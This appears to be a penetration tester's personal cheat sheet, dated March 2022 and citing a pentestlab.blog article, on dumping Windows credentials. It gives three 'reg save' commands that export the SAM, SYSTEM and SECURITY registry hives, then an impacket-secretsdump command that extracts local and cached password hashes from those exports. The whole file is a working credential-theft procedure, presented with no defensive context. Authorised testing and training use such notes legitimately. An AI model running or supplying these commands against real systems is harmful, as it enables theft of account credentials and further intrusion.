
#@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
#@  
#@  IMPACKET DUMP LOCAL CREDS AND CACHED CREDS
#@  
#@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@   2022-03-04[Mar-Fri]21-15PM 

##https://pentestlab.blog/2018/04/04/dumping-clear-text-credentials/

DUMP HASHES FROM REGISTRY FIRST

reg save hklm\sam sam.dump
reg save hklm\system system.dump
reg save hklm\security security.dump

USE IMPACKET TO DISPLAY HASHES

impacket-secretsdump -sam sam.dump -security security.dump -system system.dump local

